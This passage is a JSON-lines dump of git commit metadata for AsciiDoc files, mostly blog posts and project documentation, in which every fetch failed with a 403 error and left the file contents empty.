'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"447394f79154ec3709fe49d5a38200bf38018843","subject":"Added Industroyer IoCs","message":"Added Industroyer IoCs\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"industroyer\/README.adoc","new_file":"industroyer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a2fcd5d0b4db0231cbfb6eacf44aa989de010a27","subject":"y2b create post Just Touch It?","message":"y2b create post Just Touch It?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-01-Just-Touch-It.adoc","new_file":"_posts\/2016-06-01-Just-Touch-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de1bedd8b7d19b25518d5a39728232c925b05494","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2c9d5afd51d0f5c39e2d76380c5790df99943ab","subject":"Esc further url","message":"Esc further url\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b992383971da22cbd38136657325bd62b07395b4","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f47adc7545e313fff6b653f25a2cac076d11a54","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f0c058214853d42ecae54205635358fb679084a","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd272657d435624cad70de9431585d8870e44a18","subject":"Update 2016-06-19-My-thoughts-on-OCREC.adoc","message":"Update 2016-06-19-My-thoughts-on-OCREC.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2016-06-19-My-thoughts-on-OCREC.adoc","new_file":"_posts\/2016-06-19-My-thoughts-on-OCREC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fad60b491fa2b336c213ea73db9c29c48050fb5","subject":"Update 2018-01-30-a-late-night-thought.adoc","message":"Update 2018-01-30-a-late-night-thought.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-a-late-night-thought.adoc","new_file":"_posts\/2018-01-30-a-late-night-thought.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64b2670000da8227b067975e98099fdd9ac6f13f","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"570c24cb6973bcf712fddc3758be52bf8310464b","subject":"job: #11981 introducing implementation note for requirements tag export","message":"job: #11981 introducing implementation note for requirements tag export\n","repos":"xtuml\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc","old_file":"doc\/notes\/11444_wasl\/11981_reqs_int.adoc","new_file":"doc\/notes\/11444_wasl\/11981_reqs_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaf87299417849e05786e2b865c54fc79e6fbb0f","subject":"Fixes RC1\/RC2 URLs","message":"Fixes RC1\/RC2 URLs\n\nFixes gh-3838\n","repos":"jgrandja\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,wkorando\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,pwheel\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,mdeinum\/spring-security,pwheel\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,pwheel\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,ollie314\/spring-security,thomasdarimont\/spring-security,mdeinum\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,djechelon\/spring-security,fhanik\/spring-security,rwinch\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,rwinch\/spring-security,SanjayUser\/SpringSecurityPro,jgrandja\/spring-security,pwheel\/spring-security,olezhuravlev\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"482cdff4165cce1b25562f7797a441c7bc03da09","subject":"Update 2016-06-08-eduard-hola-mundo.adoc","message":"Update 2016-06-08-eduard-hola-mundo.adoc","repos":"eduardo76609\/eduardo76609.github.io,eduardo76609\/eduardo76609.github.io,eduardo76609\/eduardo76609.github.io,eduardo76609\/eduardo76609.github.io","old_file":"_posts\/2016-06-08-eduard-hola-mundo.adoc","new_file":"_posts\/2016-06-08-eduard-hola-mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eduardo76609\/eduardo76609.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a830157d3359d156aa9c47cb1a798bccef4378e1","subject":"example: finding last commit dates for all files","message":"example: finding last commit dates for all files\n","repos":"virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin","old_file":"notes\/HandyCommandsProjectReview.adoc","new_file":"notes\/HandyCommandsProjectReview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/virgo47\/litterbin.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"80e16187f3ad35265399b418d3bd5e18fcbf736a","subject":"Update documentation","message":"Update documentation\n","repos":"chirino\/docker-maven-plugin,fabric8io\/docker-maven-plugin,vjuranek\/docker-maven-plugin,jgangemi\/docker-maven-plugin,rhuss\/docker-maven-plugin,thomasvandoren\/docker-maven-plugin,vjuranek\/docker-maven-plugin,rhuss\/docker-maven-plugin,fabric8io\/docker-maven-plugin,scoplin\/docker-maven-plugin,vjuranek\/docker-maven-plugin,mattbetzel\/docker-maven-plugin,fabric8io\/docker-maven-plugin","old_file":"src\/main\/asciidoc\/inc\/_goals.adoc","new_file":"src\/main\/asciidoc\/inc\/_goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattbetzel\/docker-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89dfaeb44cecd9264a177dbb4d67a9cd878bc90f","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jax-rs\/resteasy-client\/readme.adoc","new_file":"jax-rs\/resteasy-client\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1439ac72c38bdf1b5ca62e8c1353ab17561a1420","subject":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09c2d699986985d400186667435b6d75b2e38c55","subject":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","message":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36d05f2fd6c94439b07224c7f32314de1cfdfd2f","subject":"Update 2017-10-10-Your-Blog-title.adoc","message":"Update 2017-10-10-Your-Blog-title.adoc","repos":"Zatttch\/zatttch.github.io,Zatttch\/zatttch.github.io,Zatttch\/zatttch.github.io,Zatttch\/zatttch.github.io","old_file":"_posts\/2017-10-10-Your-Blog-title.adoc","new_file":"_posts\/2017-10-10-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Zatttch\/zatttch.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df6cf9b840568ff595b14b04b07acc18c7228a20","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f57e5150ca76cc1ece763800767fa193a99767d","subject":"Phrasing and ref FSP","message":"Phrasing and ref FSP\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1586158eb5f4292299fe22009cfb3673b69025fb","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"853e036906067073dfbe5c9b93af9aedd89d20e5","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13a4e1eb6777613286381d8f5f38509f0eb95fd5","subject":"Initial commit of my Go notes","message":"Initial commit of my Go notes\n","repos":"0xMF\/toybox","old_file":"content\/post\/golang.asciidoc","new_file":"content\/post\/golang.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9da8bafeb6d857ef12fd2ed54402dccd53ec2a2f","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f80d7008b0390b102b8fa2accc6bdc1a0877ed75","subject":"Administrator can lookup all existing service monitors and their configuration parameters","message":"Administrator can lookup all existing service monitors and their configuration parameters\n\n- NMS-6634: Create documentation for DNSResolutionMonitor\n","repos":"tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DNSResolutionMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DNSResolutionMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"27f48b78865f5e40545ec2a58b89193ff9589dd4","subject":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","message":"Update 2016-03-20-Comment-arreter-de-ronfler.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_file":"_posts\/2016-03-20-Comment-arreter-de-ronfler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85433e2e74c902e1e933e8f5659c5066e11ec3b0","subject":"y2b create post The Ultimate iPhone 7 Case?","message":"y2b create post The Ultimate iPhone 7 Case?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-21-The-Ultimate-iPhone-7-Case.adoc","new_file":"_posts\/2016-09-21-The-Ultimate-iPhone-7-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"242d8a96e91fcbd02c67f2cb6293cf3fe215266c","subject":"Added a list of examples and challenges.","message":"Added a list of examples and challenges.\n","repos":"merose\/VMSRobot3,merose\/VMSRobot3","old_file":"examples.asciidoc","new_file":"examples.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/merose\/VMSRobot3.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2cacbb1f38625447a0f1508bbc2e73d3cec17d0f","subject":"Worked on fsevents disk log format documentation","message":"Worked on fsevents disk log format documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/MacOS File System Events Disk Log Stream format.asciidoc","new_file":"documentation\/MacOS File System Events Disk Log Stream format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac9e625933d65e89ad66257d2bd910935edd1450","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_file":"_posts\/2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc8c96b98803454c9c274884dce9f0a7584ccbe3","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d4c597b116ee3b020c18e685fe9e82747ccae2e","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6eabb84f33e2dd09d7a36e5f764e853254f320ad","subject":"y2b create post LOTR: War In The North Collector's Edition Unboxing","message":"y2b create post LOTR: War In The North Collector's Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-01-LOTR-War-In-The-North-Collectors-Edition-Unboxing.adoc","new_file":"_posts\/2011-11-01-LOTR-War-In-The-North-Collectors-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ea2ca5b060829164c0337c7691f7caa17659d6","subject":"Local clone","message":"Local clone\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Dev tools\/Exercice.adoc","new_file":"Dev tools\/Exercice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba9a76f2206d7c7342c1161be88469a8c1a270a6","subject":"Adding release notes for release of coverage revapi_java_spi revapi_java","message":"Adding release notes for release of coverage revapi_java_spi revapi_java\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210624-bugix-release.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210624-bugix-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a638a19d6254c07708d662acdcc498e30e4ea302","subject":"Update 2017-05-01-Deunz-blog-page.adoc","message":"Update 2017-05-01-Deunz-blog-page.adoc","repos":"deunz\/deunz.github.io,deunz\/deunz.github.io,deunz\/deunz.github.io,deunz\/deunz.github.io","old_file":"_posts\/2017-05-01-Deunz-blog-page.adoc","new_file":"_posts\/2017-05-01-Deunz-blog-page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deunz\/deunz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17e42ba61def5a7a1fad8588f804f7409845c043","subject":"add event","message":"add event\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojuresouth.adoc","new_file":"content\/events\/2019\/clojuresouth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d20e2bf2cb61730bae7459513caab5748c5f472e","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bbea70c00e91cc7be460d485d2250738f876541","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4eaf1931a8e76acee25b8d83c0f97c4f74a22d96","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0938fb3b120e3647585d76f1b538a130dbc88cda","subject":"Update 2015-03-01-no-lol-at-March.adoc","message":"Update 2015-03-01-no-lol-at-March.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-03-01-no-lol-at-March.adoc","new_file":"_posts\/2015-03-01-no-lol-at-March.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"446efa557375793c8cb42feff55bea39de8b0e6c","subject":"Update 2016-03-02-Y-J-Soft-Github.adoc","message":"Update 2016-03-02-Y-J-Soft-Github.adoc","repos":"YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io,YJSoft\/yjsoft.github.io","old_file":"_posts\/2016-03-02-Y-J-Soft-Github.adoc","new_file":"_posts\/2016-03-02-Y-J-Soft-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YJSoft\/yjsoft.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7beeea3369288cbca3aff5cf723c594b94ca8d6f","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 